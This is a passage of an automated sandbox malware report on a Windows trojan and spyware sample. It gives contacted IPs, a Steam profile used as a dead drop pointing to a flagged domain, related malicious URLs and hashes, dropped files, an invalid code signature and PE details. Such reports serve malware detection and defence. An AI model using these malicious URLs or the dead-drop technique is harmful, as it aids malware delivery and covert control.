                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/mo0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  188.114.97.3
                                                                                                  		llal.xyzEuropean Union
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  104.102.42.29
                                                                                                  		steamcommunity.comUnited States
                                                                                                  		16625AKAMAI-ASUSfalse

                                                                                                  General Information

                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                  Analysis ID:1450268
                                                                                                  Start date and time:2024-06-01 17:40:23 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 53s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:6
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:0x001900000002ab40-59.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal88.troj.spyw.winEXE@1/2@2/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 86%
                                                                                                  • Number of executed functions: 21
                                                                                                  • Number of non-executed functions: 222
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  No simulations

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  188.114.97.3Transferencia.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.uqdr.cn/yfa0/
                                                                                                  yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.henslotalt.us/cr12/?lzrh5nq=ZHVJW2wJ/VQGxUoz6qiOZ8w6Wo640eMsoc9vrD59PAK9Sx7gNniNBNq4iXknaa0Lla+k&4hO=uDKHpnQP30f0l8F
                                                                                                  DHL Newly Arrived Parcel.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.fame.tm/3rcs/
                                                                                                  U4atTYmWzmPN3Kz.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.faxinguxn6.cn/ofk1/?nxY=DTA0G&1vd=BhKqFmuQRptfX/n9DLbFkRq1DUWxM6hSl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26Elzi1DF2AKireGjxGk82VauFWzKi6FMJEms=
                                                                                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousLummaC, FormBook, LummaC StealerBrowse
                                                                                                  • www.uqdr.cn/yfa0/?kLM=8LAHT&ORBtGb6=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUQYeEayqMenLhJs5NvVIv7PEy1DTj2A==
                                                                                                  Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.uqdr.cn/yfa0/
                                                                                                  QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • filetransfer.io/data-package/pp08lG4v/download
                                                                                                  QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                  • filetransfer.io/data-package/pp08lG4v/download
                                                                                                  http://update-terima-dana.sistemufdate.my.id/Get hashmaliciousUnknownBrowse
                                                                                                  • update-terima-dana.sistemufdate.my.id/
                                                                                                  http://selectidordchkin.com/6whxl3wvGet hashmaliciousUnknownBrowse
                                                                                                  • selectidordchkin.com/6whxl3wv
                                                                                                  104.102.42.29rM2JeKle6t.exeGet hashmaliciousVidarBrowse
                                                                                                    n8IqmAD3Mh.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                          7t7wUILTuQ.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                                                                                                            xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                              PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                  Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      steamcommunity.comrM2JeKle6t.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 23.192.247.89
                                                                                                                      n8IqmAD3Mh.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                      • 23.1.8.105
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 23.197.127.21
                                                                                                                      7t7wUILTuQ.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                      • 104.102.42.29
                                                                                                                      PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                      • 104.102.42.29

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUSTransferencia.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 172.67.137.210
                                                                                                                      https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQGet hashmaliciousSharepointPhisherBrowse
                                                                                                                      • 172.67.182.171
                                                                                                                      file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      Quarantined Messages.zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      CT200.cmd.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      IMG_10257576001pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      RFQ-A000460874.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      DHL Newly Arrived Parcel.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      AKAMAI-ASUSRFAwChXSve.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 23.201.248.158
                                                                                                                      https://download2.easeus.com/installer_rss_new.phpGet hashmaliciousUnknownBrowse
                                                                                                                      • 184.28.90.27
                                                                                                                      FW_ Matt Fisher shared the folder _Salishan DD Upload Folder_ with you.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 2.19.104.72
                                                                                                                      http://1009.liqing-71.workers.dev/Get hashmaliciousUnknownBrowse
                                                                                                                      • 2.19.104.10
                                                                                                                      https://www-visacom-sg.wgmspu93576.workers.dev/Get hashmaliciousUnknownBrowse
                                                                                                                      • 2.19.104.10
                                                                                                                      xS8bwPQjO2.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 23.36.14.136
                                                                                                                      EgucScJumS.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 104.119.246.45
                                                                                                                      DBGServer.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 88.221.168.8
                                                                                                                      https://www.jotform.com/assign/241498205962059/ZVp1QmtoY0ZuamtQcXNSRHMyajRhSk9WUjJybmZzeVFlL2hNbGNONzNOTW12WXZOTEYvUVFSelJkaU5sNjVQSVpmenBpUjRPQ29RbFZzNDYyY1I4R1I4MnhPVmtyRUJKeTFGbVdyMWpTelFvL1lHbjNkYy9GMVY1TG9hRHh3Wk0=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.102.23.137

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      37f463bf4616ecd445d4a1937da06e19MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      temp2.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      Unspuriousness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      ffff6f6.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      detalle_transferencia_2024-05-13T064143.173 0200_3049280002017526_PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      Kompagnonernes.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29
                                                                                                                      Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      • 104.102.42.29

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\2ae977f4-db12-4876-9e4d-fc8d1778842d[1].txt

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      File Type:ASCII text, with very long lines (48844), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48844
                                                                                                                      Entropy (8bit):5.374852585488459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:vzsNZzFhOnDMIf19+kXSV0brSxnb22fnc6KWWhv6GYcnaxqLj3pd96B3hgFOQ9mE:v0zPO9f1ouYgcq331UaFOQCiunnT7KTp
                                                                                                                      MD5:4FE2F731AD372C0C62F7B574433704C6
                                                                                                                      SHA1:20DCF791FBD43C2E231D9CEBF1F2ECE001917BD5
                                                                                                                      SHA-256:C2CF6CF3503346442004B05207DD6854F21ED207040AAC133818D6AD7C704658
                                                                                                                      SHA-512:4A0CB373DC6594B3B01AFD24A35EB7599FD2BF8482B2464E54DA7115E163482AADD6B0B4169E3C4706CF98043363B9E96BAB0B0C019B0A522F9A3CC480A90CC7
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:Qz8SERZbFQgTWzIVEhEUQj0SEyAYFRITWhsNEhFiZGlRCRYVPRITIBgVEhNEGw0SEVxkeV1SVVVrbnRvV1JeVGhldFpBb1VQbm1hSlJAE0RZQVMTGDMXEhMgGBUQRRYDFwMfChgVEhEUGRVCXSICFRBSXEtYX1YuXU1XEz4ZFxITfRQ/EhEUGUw4EyAYFRIRFlcVCBMiWmluUgwbGzgTIBgVEhEWSRUIEyJkaX5eV1hbbm9HV1pVXVFla3FbcldYVxFnQWRub1VLUEARcFhDUxEsMhUSERQZFxBHIgIVAx0+GRcSEyAYF0JfFgMXEFBoSlpfVBpcT1cRChgVEhFJFT0SEyAYTjgRFBkXEhMiVhcIERZba25QOBoZOBEUGRcSEyJIFwgRFmVrflxjWVlubXNWWFVfZWRpcVlGVlpXE0JdQVNtaGxEV0EgfFRGUBYVPRITIBgVEhNAGw0SAiwyFRIRFBkXEENuGg8SE1dRRV1eZRZQSlQWMxcSEyBFGTgRFBkXSTkgGBUSERQbWRAJIBpXbm1XARUeOSAYFRIRFBtHEAkgGmlufVtaVl5vXH9aXVZYXGtucGhKWl9UFH1SRG9cbUZXQxR9VkZSIhQ/EhEUGRcSEXQaDxIAGDMXEhMgGBUQQVobDRIRY1BHXVxRF1JKViIyFRIRFEQbOBMgGBVJOxQZFxITIBpbEAsUG1Vub2MAFx47FBkXEhMgGkUQCxQba25/b1tUXm1oflhdVGxdaW5yXEtYX1YgbVtBRVVbW1dvXG1GV0MUfVZGUiIUPxIRFBkXEhF0Gg8SABgzFxITIBgVEEFaGw0SEWNQR11cURdSSlYiMhUSERREGzgTIBgVSTsUGRcSEyAaWxALFBtVbm9jABceOxQZFxITIBpFEAsUG2tuf29bVF5taH5YXVRsXWluclxLWF9WIHtUXFBGQGtuZnNdRxJ1VU1WEB8KGBUSERQZFUYROhgEHjsUGRcSEyAaRVwTDhkVUVty

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\76561199619938930[1].htm

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2989), with CRLF, LF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34764
                                                                                                                      Entropy (8bit):5.382752455633575
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Hdpqm+0Ih3YAA9CWGO4fcDAvPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2A:Hd8m+0Ih3YAA9CWGO4FvPzzgiJmDzJt3
                                                                                                                      MD5:94CEEC911E1A763E1D375F9F8232F09F
                                                                                                                      SHA1:16B337A272C2437E54C01432736755A65B61DC6F
                                                                                                                      SHA-256:1E152B12BF7FDC7A2734F0E4D6E9A7E535D218EF1E7E0EFEC1CD5DF818046B32
                                                                                                                      SHA-512:F2473AE8D96DA7B743942100A5FB27C3561BFB1CF3E1BB285C834C9BFA9C7B52CDD294212E537944F0B8C97433032804EFA06AE11A0EB11ECA85D21A92181720
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.743554920865929
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:0x001900000002ab40-59.exe
                                                                                                                      File size:10'445'744 bytes
                                                                                                                      MD5:889cc88bca04e05c46d9e74636baee19
                                                                                                                      SHA1:28a273447716b7dea5526a499b801d025ac3ea6e
                                                                                                                      SHA256:00aac20f7fa77d5b959244157aad331bcdd28e3c4240e4a7106848625824fa78
                                                                                                                      SHA512:ceb3898654d7ead883bf69ea2deadc8e16d3c57d587c20a95657f244845a79e9de252407009f189b793d190defa880af876e0cf5700bb4c033fc4f83ee1b440c
                                                                                                                      SSDEEP:196608:X+SSJ7PbDdh0HtQba8z1sjzkAilU4I4pq:X+5J7PbDjOQba8psjzyz
                                                                                                                      TLSH:37B6D025FBD79301EB272638157C7D7B07217AC41AF846CB92626C881975BE24833F6E
                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...gROf..........".................P.............@..........................P............@.............................W.......<..

                                                                                                                      File Icon

                                                                                                                      Icon Hash:57d9d3068c4c6d17

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4e1250
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x664F5267 [Thu May 23 14:27:51 2024 UTC]
                                                                                                                      TLS Callbacks:0x4b10f0, 0x4e0140, 0x4d0630, 0x4dfd90, 0x4535f0, 0x4d6890
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:14c3b6ff09b7337bfc60a8e85aa19d2b

                                                                                                                      Authenticode Signature

                                                                                                                      Signature Valid:false
                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                      Error Number:-2146869232
                                                                                                                      Not Before, Not After
                                                                                                                      • 20/03/2024 15:23:35 21/03/2026 15:23:35
                                                                                                                      Subject Chain
                                                                                                                      • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                                                                                      Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                                                                                      Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                                                                                      Serial:6F126C9CC287DE458CE890F6

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      call 00007FBDACB29CCAh
                                                                                                                      jmp 00007FBDACB29B3Dh
                                                                                                                      mov ecx, dword ptr [00540010h]
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      mov edi, BB40E64Eh
                                                                                                                      mov esi, FFFF0000h
                                                                                                                      cmp ecx, edi
                                                                                                                      je 00007FBDACB29CC6h
                                                                                                                      test esi, ecx
                                                                                                                      jne 00007FBDACB29CE8h
                                                                                                                      call 00007FBDACB29CF1h
                                                                                                                      mov ecx, eax
                                                                                                                      cmp ecx, edi
                                                                                                                      jne 00007FBDACB29CC9h
                                                                                                                      mov ecx, BB40E64Fh
                                                                                                                      jmp 00007FBDACB29CD0h
                                                                                                                      test esi, ecx
                                                                                                                      jne 00007FBDACB29CCCh
                                                                                                                      or eax, 00004711h
                                                                                                                      shl eax, 10h
                                                                                                                      or ecx, eax
                                                                                                                      mov dword ptr [00540010h], ecx
                                                                                                                      not ecx
                                                                                                                      pop edi
                                                                                                                      mov dword ptr [00540014h], ecx
                                                                                                                      pop esi
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 14h
                                                                                                                      and dword ptr [ebp-0Ch], 00000000h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      and dword ptr [ebp-08h], 00000000h
                                                                                                                      push eax
                                                                                                                      call dword ptr [0053BF6Ch]
                                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                      call dword ptr [0053BEE0h]
                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                      call dword ptr [0053BED8h]
                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                      push eax
                                                                                                                      call dword ptr [0053C03Ch]
                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                      xor eax, ecx
                                                                                                                      leave
                                                                                                                      ret
                                                                                                                      mov eax, 00004000h
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      mov al, 01h
                                                                                                                      ret
                                                                                                                      push 00030000h
                                                                                                                      push 00010000h
                                                                                                                      push 00000000h
                                                                                                                      call 00007FBDACB3A7CAh
                                                                                                                      add esp, 0Ch

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x13ba8b0x57.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x13bae20x3c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1570000x83f490.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x9f02000x61b0.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9970000xb4dc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x138d6c0x38.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x138cc00x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1132200xc0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x13be280x308.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x13a4240x280.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x1116bf0x1118001ede1476ef3d330e913bc3f3bad41adbFalse0.5134942370315356data6.7672182256347195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x1130000x2c8fc0x2ca00eb08174cca2ce5dc4ff957e8244052faFalse0.4339548319327731data5.706910771292372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x1400000x13f680x3c00549b9ba7bb8ee6d2b19e29f27a3f2d2eFalse0.14459635416666666data3.719138123449055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0x1540000xb90x2009d97d87a24a59708eda3979804b492fcFalse0.048828125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      SHARED0x1550000x40x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      Shared0x1560000xed40x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x1570000x83f4900x83f600475b272ba34b20100e9eb1b74ca114d4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x9970000x6d6000x6d600d29c5b3ef78f9da59ae385c1ae6cba37False0.9119285714285714data7.972070171786351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      BIN0x1595780x120d7dASCII text, with very long lines (65434)0.1616525650024414
                                                                                                                      BIN0x27a2f80x28b69JSON data0.7573113617692386
                                                                                                                      BIN0x2a2e640x244XML 1.0 document, ASCII text0.41379310344827586
                                                                                                                      BIN0x2a30a80x968Microsoft Cabinet archive data, 2408 bytes, 1 file, at 0x2c +A "brand_config", number 1, 1 datablock, 0x1 compression1.0045681063122924
                                                                                                                      RT_ICON0x2a3a100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.6551418439716312
                                                                                                                      RT_ICON0x2a3e780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.4160412757973734
                                                                                                                      RT_ICON0x2a4f200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.2991701244813278
                                                                                                                      RT_ICON0x2a74c80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.2438001889466226
                                                                                                                      RT_ICON0x2ab6f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.1455548326038093
                                                                                                                      RT_ICON0x2bbf180x4dfbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9968441616991434
                                                                                                                      RT_DIALOG0x2c0d140xe6data0.34782608695652173
                                                                                                                      RT_DIALOG0x2c0dfc0x1dedata0.3075313807531381
                                                                                                                      RT_STRING0x2c0fdc0x19cdataChineseTaiwan0.7038834951456311
                                                                                                                      RT_STRING0x2c11780x410dataCzechCzech Republic0.40384615384615385
